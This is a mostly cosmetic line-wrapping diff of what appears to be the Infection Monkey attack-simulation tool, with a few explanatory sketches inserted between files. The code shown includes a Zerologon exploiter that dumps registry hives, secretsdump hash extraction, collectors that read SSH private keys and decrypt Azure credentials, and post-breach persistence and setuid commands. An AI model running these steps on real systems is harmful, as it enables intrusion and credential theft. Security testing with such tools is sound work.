@ -339,7 +346,8 @@ class ZerologonExploiter(HostExploiter):
+ "reg save HKLM\\SECURITY security.save"
)
# Get HKLM keys locally (can't run these together because it needs to call do_get()).
# Get HKLM keys locally (can't run these together because it needs to call
# do_get()).
remote_shell.onecmd("get system.save")
remote_shell.onecmd("get sam.save")
remote_shell.onecmd("get security.save")

View File

@ -132,8 +132,10 @@ class DumpSecrets:
self.connect()
except Exception as e:
if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# SMBConnection failed. That might be because there was no way to
# log into the
# target system. We just have a last resort. Hope we have tickets
# cached and that they
# will work
LOG.debug(
"SMBConnection didn't work, hoping Kerberos will help (%s)"
@ -162,11 +164,13 @@ class DumpSecrets:
and os.getenv("KRB5CCNAME") is not None
and self.__do_kerberos is True
):
# Giving some hints here when SPN target name validation is set to something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/.
# Giving some hints here when SPN target name validation is set to
# something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs
# different to cifs/.
LOG.error(
"Policy SPN target name validation might be restricting full DRSUAPI dump."
+ "Try -just-dc-user"
"Policy SPN target name validation might be restricting full "
"DRSUAPI dump." + "Try -just-dc-user"
)
else:
LOG.error("RemoteOperations failed: %s" % str(e))
@ -208,7 +212,8 @@ class DumpSecrets:
LOG.debug(traceback.print_exc())
LOG.error("LSA hashes extraction failed: %s" % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work.
# NTDS Extraction we can try regardless of RemoteOperations failing. It might
# still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
@ -231,7 +236,8 @@ class DumpSecrets:
except Exception as e:
LOG.debug(traceback.print_exc())
if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# We don't store the resume file if this error happened, since this error
# is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
@ -239,7 +245,8 @@ class DumpSecrets:
LOG.error(e)
if self.__use_VSS_method is False:
LOG.error(
"Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter"
"Something wen't wrong with the DRSUAPI approach. Try again with "
"-use-vss parameter"
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:

View File

@ -35,9 +35,11 @@ class OptionsForSecretsdump:
target=None,
target_ip=None,
):
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in ../zerologon.py
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in
# ../zerologon.py
self.dc_ip = dc_ip
# just_dc becomes False, and sam, security, and system are assigned in get_original_pwd_nthash() in ../zerologon.py
# just_dc becomes False, and sam, security, and system are assigned in
# get_original_pwd_nthash() in ../zerologon.py
self.just_dc = just_dc
self.sam = sam
self.security = security

View File

@ -134,8 +134,10 @@ class RemoteShell(cmd.Cmd):
self.__outputBuffer += data.decode(self.CODEC)
except UnicodeDecodeError:
LOG.error(
"Decoding error detected, consider running chcp.com at the target,\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute wmiexec.py "
"Decoding error detected, consider running chcp.com at the target,"
"\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand "
"then execute wmiexec.py "
"again with -codec and the corresponding codec"
)
self.__outputBuffer += data.decode(self.CODEC, errors="replace")
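
The fallback that follows the warning above boils down to this sketch (variable names taken from the snippet; codec stands in for self.CODEC):

try:
    text = data.decode(codec)
except UnicodeDecodeError:
    # keep the output instead of dropping it; undecodable bytes become replacement characters
    text = data.decode(codec, errors="replace")
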

View File

@ -26,7 +26,8 @@ LOG_CONFIG = {
"disable_existing_loggers":False,
"formatters":{
"standard":{
"format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s"
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s"
},
},
"handlers":{
@ -71,8 +72,8 @@ def main():
print("Error loading config: %s, using default" % (e,))
else:
print(
"Config file wasn't supplied and default path: %s wasn't found, using internal default"
% (config_file,)
"Config file wasn't supplied and default path: %s wasn't found, using internal "
"default" % (config_file,)
)
print(
@ -104,7 +105,8 @@ def main():
if WormConfiguration.use_file_logging:
if os.path.exists(log_path):
# If log exists but can't be removed it means other monkey is running. This usually happens on upgrade
# If log exists but can't be removed it means other monkey is running. This usually
# happens on upgrade
# from 32bit to 64bit monkey on Windows. In all cases this shouldn't be a problem.
try:
os.remove(log_path)
@ -126,7 +128,8 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
os.getpid()
)
LOG.info(f"version: {get_version()}")

View File

@ -100,7 +100,8 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
"Default server: %s is already in command servers list" % self._default_server
"Default server: %s is already in command servers list" %
self._default_server
)
def start(self):
@ -227,7 +228,8 @@ class InfectionMonkey(object):
host_exploited = True
VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send()
if exploiter.RUNS_AGENT_ON_SUCCESS:
break # if adding machine to exploited, won't try other exploits on it
break # if adding machine to exploited, won't try other exploits
# on it
if not host_exploited:
self._fail_exploitation_machines.add(machine)
VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send()
@ -244,12 +246,14 @@ class InfectionMonkey(object):
elif not WormConfiguration.alive:
LOG.info("Marked not alive from configuration")
# if host was exploited, before continue to closing the tunnel ensure the exploited host had its chance to
# if host was exploited, before continue to closing the tunnel ensure the exploited
# host had its chance to
# connect to the tunnel
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
"Sleeping %d seconds for exploited machines to connect to tunnel",
time_to_sleep
)
time.sleep(time_to_sleep)
@ -261,7 +265,8 @@ class InfectionMonkey(object):
except PlannedShutdownException:
LOG.info(
"A planned shutdown of the Monkey occurred. Logging the reason and finishing execution."
"A planned shutdown of the Monkey occurred. Logging the reason and finishing "
"execution."
)
LOG.exception("Planned shutdown, reason:")
@ -393,7 +398,8 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
"Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
"Failed exploiting %r with exploiter %s", machine,
exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
@ -452,7 +458,8 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
"Monkey couldn't find server with {} default tunnel.".format(
self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)

View File

@ -52,6 +52,7 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
@ -59,10 +60,12 @@ if is_windows_os():
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")
@ -88,7 +91,8 @@ else:
continue
try:
ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff))
except IOError: # interface is present in routing tables but does not have any assigned IP
except IOError: # interface is present in routing tables but does not have any
# assigned IP
ifaddr = "0.0.0.0"
else:
addrfamily = struct.unpack("h", ifreq[16:18])[0]
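
The route lookup above reads the kernel's text interface; a simplified, stdlib-only sketch of the /proc/net/route side (not the scapy-style parser referenced in the comment) looks like this:

import socket
import struct

def default_gateways():
    gateways = []
    with open("/proc/net/route") as f:
        for line in f.readlines()[1:]:                # skip the header row
            iface, dest, gateway = line.split()[:3]   # hex, little-endian fields
            if dest == "00000000":                    # 0.0.0.0/0 -> default route
                gateways.append((iface, socket.inet_ntoa(struct.pack("<L", int(gateway, 16)))))
    return gateways
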

View File

@ -49,22 +49,21 @@ class MSSQLFinger(HostFinger):
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
LOG.info(
"Socket timeout reached, maybe browser service on host: {0} doesnt exist".format(
host
)
"Socket timeout reached, maybe browser service on host: {0} doesnt "
"exist".format(host)
)
sock.close()
return False
except socket.error as e:
if e.errno == errno.ECONNRESET:
LOG.info(
"Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.".format(
host
)
"Connection was forcibly closed by the remote host. The host: {0} is "
"rejecting the packet.".format(host)
)
else:
LOG.error(
"An unknown socket error occurred while trying the mssql fingerprint, closing socket.",
"An unknown socket error occurred while trying the mssql fingerprint, "
"closing socket.",
exc_info=True,
)
sock.close()
@ -82,7 +81,8 @@ class MSSQLFinger(HostFinger):
if len(instance_info) > 1:
host.services[self._SCANNED_SERVICE][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
# Each instance's info is nested under its own name, if there are multiple instances
# Each instance's info is nested under its own name, if there are multiple
# instances
# each will appear under its own name
host.services[self._SCANNED_SERVICE][instance_info[1]][
instance_info[i - 1]
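
The pairwise indexing above follows the SQL Server Browser reply format: each instance is reported as a run of ";"-separated name/value pairs. A rough sketch of folding that into per-instance dicts, with the ";;" instance separator assumed rather than taken from the code shown:

instances = {}
for chunk in payload.split(";;"):          # payload: decoded Browser-service reply body
    fields = chunk.split(";")
    if len(fields) > 1:
        # fields alternate name/value, e.g. ServerName;HOST;InstanceName;SQLEXPRESS;Version;...
        instances[fields[1]] = dict(zip(fields[0::2], fields[1::2]))
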

View File

@ -44,9 +44,11 @@ class NetworkScanner(object):
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
'inaccessible_subnets' config value. If so, all other subnets in the config value
shouldn't be accessible.
All these subnets are returned.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is
running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
@ -54,7 +56,8 @@ class NetworkScanner(object):
if NetworkScanner._is_any_ip_in_subnet(
[str(x) for x in self._ip_addresses], subnet_str
):
# If machine has IPs from 2 different subnets in the same group, there's no point checking the other
# If machine has IPs from 2 different subnets in the same group, there's no
# point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
@ -74,9 +77,12 @@ class NetworkScanner(object):
:param stop_callback: A callback to check at any point if we should stop scanning
:return: yields a sequence of VictimHost instances
"""
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
# However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be
# the best decision
# However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (
# pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher
# than CPU core size
# But again, balance
pool = Pool(ITERATION_BLOCK_SIZE)
victim_generator = VictimHostGenerator(
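
The per-subnet membership test that the inaccessible_subnets logic above relies on can be sketched with the standard library (the scanner has its own helper for this; the addresses below are hypothetical):

from ipaddress import ip_address, ip_network

def is_any_ip_in_subnet(ip_strings, subnet_str):
    network = ip_network(subnet_str, strict=False)
    return any(ip_address(ip) in network for ip in ip_strings)

is_any_ip_in_subnet(["10.0.1.5", "192.168.56.2"], "10.0.1.0/24")   # -> True
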

View File

@ -59,7 +59,8 @@ class PingScanner(HostScanner, HostFinger):
ttl = int(regex_result.group(0))
if ttl <= LINUX_TTL:
host.os["type"] = "linux"
else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up.
else: # as far we we know, could also be OSX/BSD but lets handle that when it
# comes up.
host.os["type"] = "windows"
host.icmp = True
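
The TTL heuristic in that branch rests on typical default values: Linux-like stacks usually reply with a TTL of 64, Windows with 128, so a received TTL at or below 64 is classified as Linux. As a one-liner:

LINUX_TTL = 64   # default TTL for most Linux/Unix stacks; Windows defaults to 128

def guess_os_from_ttl(ttl: int) -> str:
    return "linux" if ttl <= LINUX_TTL else "windows"
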

View File

@ -51,12 +51,14 @@ class PostgreSQLFinger(HostFinger):
self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = (
"The PostgreSQL server was unexpectedly accessible with the credentials - "
+ f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?"
+ f"user: '{self.CREDS['username']}' and password: '"
f"{self.CREDS['password']}'. Is this a honeypot?"
)
return True
except psycopg2.OperationalError as ex:
# try block will throw an OperationalError since the credentials are wrong, which we then analyze
# try block will throw an OperationalError since the credentials are wrong, which we
# then analyze
try:
exception_string = str(ex)
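
A stripped-down version of the probe described above: deliberately wrong credentials, with the OperationalError text kept for analysis (host and credentials below are placeholders):

import psycopg2

try:
    psycopg2.connect(host="10.0.0.5", user="monkey", password="guest", connect_timeout=3)
except psycopg2.OperationalError as ex:
    exception_string = str(ex)   # e.g. hints about password auth, pg_hba.conf rules or enforced SSL
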

View File

@ -68,14 +68,16 @@ class SMBNegoFingerData(Packet):
("separator1", b"\x02"),
(
"dialect1",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d"
b"\x20\x31\x2e\x30\x00",
),
("separator2", b"\x02"),
("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3", b"\x02"),
(
"dialect3",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72"
b"\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
),
("separator4", b"\x02"),
("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
@ -104,12 +106,18 @@ class SMBSessionFingerData(Packet):
("bcc1", ""),
(
"Data",
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c"
b"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00"
b"\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53"
b"\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20"
b"\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
b"\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
),
]

View File

@ -22,7 +22,8 @@ class TcpScanner(HostScanner, HostFinger):
def get_host_fingerprint(self, host, only_one_port=False):
"""
Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration.
Scans a target host to see if it's alive using the tcp_target_ports specified in the
configuration.
:param host: VictimHost structure
:param only_one_port: Currently unused.
:return: T/F if there is at least one open port.

View File

@ -129,7 +129,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
possible_ports.append((port, sock))
continue
if err == 10035: # WSAEWOULDBLOCK is valid, see
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29.aspx?f=255&MSPPError=-2147217396
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29
# .aspx?f=255&MSPPError=-2147217396
possible_ports.append((port, sock))
continue
if err == 115: # EINPROGRESS 115 /* Operation now in progress */
@ -164,7 +165,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
readable_sockets, _, _ = select.select(
[s[1] for s in connected_ports_sockets], [], [], 0
)
# read first BANNER_READ bytes. We ignore errors because service might not send a decodable byte string.
# read first BANNER_READ bytes. We ignore errors because service might not send a
# decodable byte string.
banners = [
sock.recv(BANNER_READ).decode(errors="ignore")
if sock in readable_sockets
@ -209,7 +211,8 @@ def _get_traceroute_bin_path():
Its been built using the buildroot utility with the following settings:
* Statically link to musl and all other required libs
* Optimize for size
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure it behaves as expected
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure
it behaves as expected
:return: Path to traceroute executable
"""
@ -223,7 +226,8 @@ def _parse_traceroute(output, regex, ttl):
:param regex: Regex for finding an IP address
:param ttl: Max TTL. Must be the same as the TTL used as param for traceroute.
:return: List of ips which are the hops on the way to the traceroute destination.
If a hop's IP wasn't found by traceroute, instead of an IP, the array will contain None
If a hop's IP wasn't found by traceroute, instead of an IP, the array will
contain None
"""
ip_lines = output.split("\n")
trace_list = []
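
Taken together, the port-check logic above is a non-blocking connect scan: EINPROGRESS (or WSAEWOULDBLOCK on Windows) only means the handshake is still in flight, and a later select() reveals which sockets actually connected. A condensed sketch, not the module's real implementation:

import select
import socket

def check_tcp_ports_sketch(ip, ports, timeout=3.0):
    pending = []
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setblocking(False)
        err = sock.connect_ex((ip, port))
        if err in (0, 115, 10035):        # connected / EINPROGRESS / WSAEWOULDBLOCK
            pending.append((port, sock))
        else:
            sock.close()
    _, writable, _ = select.select([], [s for _, s in pending], [], timeout)
    open_ports = [port for port, s in pending
                  if s in writable and s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0]
    for _, s in pending:
        s.close()
    return open_ports
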

View File

@ -27,7 +27,8 @@ logger = logging.getLogger(__name__)
class CommunicateAsNewUser(PBA):
"""
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a Zero Trust test of the
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a
Zero Trust test of the
People pillar. See the relevant telemetry processing to see what findings are created.
"""
@ -58,7 +59,8 @@ class CommunicateAsNewUser(PBA):
def get_commandline_for_http_request(url, is_windows=is_windows_os()):
if is_windows:
format_string = (
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; '
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = ['
"Net.SecurityProtocolType]::Tls12; "
'Invoke-WebRequest {url} -UseBasicParsing"'
)
else:
@ -79,7 +81,8 @@ class CommunicateAsNewUser(PBA):
"""
if exit_status == 0:
PostBreachTelem(
self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
self,
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send()
else:
PostBreachTelem(

View File

@ -9,5 +9,6 @@ class AccountDiscovery(PBA):
def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds),
windows_cmd=windows_cmds
)

View File

@ -28,7 +28,8 @@ class SignedScriptProxyExecution(PBA):
super().run()
except Exception as e:
LOG.warning(
f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
f"An exception occurred on running PBA "
f"{POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
)
finally:
cleanup_changes(original_comspec)

View File

@ -1,7 +1,9 @@
SCHEDULED_TASK_NAME = "monkey-spawn-cmd"
SCHEDULED_TASK_COMMAND = r"C:\windows\system32\cmd.exe"
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005
# /T1053.005.md
def get_windows_commands_to_schedule_jobs():

View File

@ -16,7 +16,8 @@ __author__ = "VakarisZ"
class PBA(Plugin):
"""
Post breach action object. Can be extended to support more than command execution on target machine.
Post breach action object. Can be extended to support more than command execution on target
machine.
"""
@staticmethod
@ -61,7 +62,8 @@ class PBA(Plugin):
result = exec_funct()
if self.scripts_were_used_successfully(result):
T1064Telem(
ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
ScanStatus.USED,
f"Scripts were used to execute {self.name} post breach action."
).send()
PostBreachTelem(self, result).send()
else:

View File

@ -1,11 +1,14 @@
TEMP_FILE = "$HOME/monkey-temp-file"
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001
# /T1548.001.md
def get_linux_commands_to_setuid_setgid():
return [
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&",
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s "
f"{TEMP_FILE} &&",
'echo "Successfully changed setuid/setgid bits" &&',
f"rm {TEMP_FILE}",
]

View File

@ -1,7 +1,9 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\
import (
get_linux_commands_to_modify_shell_startup_files,
)
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\
import (
get_windows_commands_to_modify_shell_startup_files,
)

View File

@ -19,13 +19,15 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [
"\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
)
for user in USERS
]
return [
"powershell.exe",
"infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1",
"infection_monkey/post_breach/shell_startup_files/windows"
"/modify_powershell_startup_file.ps1",
"-startup_file_path {0}",
], STARTUP_FILES_PER_USER

View File

@ -75,7 +75,6 @@ def test_command_windows_custom_file_and_cmd(
@pytest.fixture
def mock_UsersPBA_linux_custom_file(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_linux_filename",
@ -91,7 +90,6 @@ def test_command_linux_custom_file(mock_UsersPBA_linux_custom_file):
@pytest.fixture
def mock_UsersPBA_windows_custom_file(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_windows_filename",
@ -107,7 +105,6 @@ def test_command_windows_custom_file(mock_UsersPBA_windows_custom_file):
@pytest.fixture
def mock_UsersPBA_linux_custom_cmd(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd",
CUSTOM_LINUX_CMD,
@ -123,7 +120,6 @@ def test_command_linux_custom_cmd(mock_UsersPBA_linux_custom_cmd):
@pytest.fixture
def mock_UsersPBA_windows_custom_cmd(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd",
CUSTOM_WINDOWS_CMD,

View File

@ -10,5 +10,5 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f"
]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -4,5 +4,5 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -1,5 +1,6 @@
def get_linux_trap_commands():
return [
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;", # trap and send SIGINT signal
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;",
# trap and send SIGINT signal
"trap - INT", # untrap SIGINT
]

View File

@ -6,7 +6,8 @@ __author__ = "itay.mizeretz"
def get_binaries_dir_path():
"""
Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise)
Gets the path to the binaries dir (files packaged in pyinstaller if it was used,
infection_monkey dir otherwise)
:return: Binaries dir path
"""
if getattr(sys, "frozen", False):

View File

@ -72,7 +72,8 @@ class SSHCollector(object):
try:
with open(public) as f:
info["public_key"] = f.read()
# By default private key has the same name as public, only without .pub
# By default private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
@ -83,7 +84,8 @@ class SSHCollector(object):
info["private_key"] = private_key
LOG.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
ScanStatus.USED, "SSH key",
"Path: %s" % private
).send()
else:
continue

View File

@ -29,7 +29,8 @@ class OperatingSystem(IntEnum):
class SystemInfoCollector(object):
"""
A class that checks the current operating system and calls system information collecting modules accordingly
A class that checks the current operating system and calls system information collecting
modules accordingly
"""
def __init__(self):
@ -113,5 +114,6 @@ class InfoCollector(object):
self.info["Azure"] = {}
self.info["Azure"]["usernames"] = [cred[0] for cred in azure_creds]
except Exception:
# If we failed to collect azure info, no reason to fail all the collection. Log and continue.
# If we failed to collect azure info, no reason to fail all the collection. Log and
# continue.
LOG.error("Failed collecting Azure info.", exc_info=True)

View File

@ -97,7 +97,8 @@ class AzureCollector(object):
# we're going to do as much of this in PS as we can.
ps_block = ";\n".join(
[
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null',
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | '
"Out-Null",
'$base64 = "%s"' % protected_data,
"$content = [Convert]::FromBase64String($base64)",
"$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms",

View File

@ -37,7 +37,8 @@ class ProcessListCollector(SystemInfoCollector):
"full_image_path":process.exe(),
}
except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in Windows/Linux.
# we may be running as non root and some processes are impossible to acquire in
# Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
"name":"null",

View File

@ -1,4 +1,5 @@
# Inspired by Giampaolo Rodola's psutil example from https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
# Inspired by Giampaolo Rodola's psutil example from
# https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
import logging
import socket

View File

@ -7,9 +7,12 @@ from infection_monkey.utils.plugins.plugin import Plugin
class SystemInfoCollector(Plugin, metaclass=ABCMeta):
"""
ABC for system info collection. See system_info_collector_handler for more info. Basically, to implement a new system info
collector, inherit from this class in an implementation in the infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the collector to the configuration
ABC for system info collection. See system_info_collector_handler for more info. Basically,
to implement a new system info
collector, inherit from this class in an implementation in the
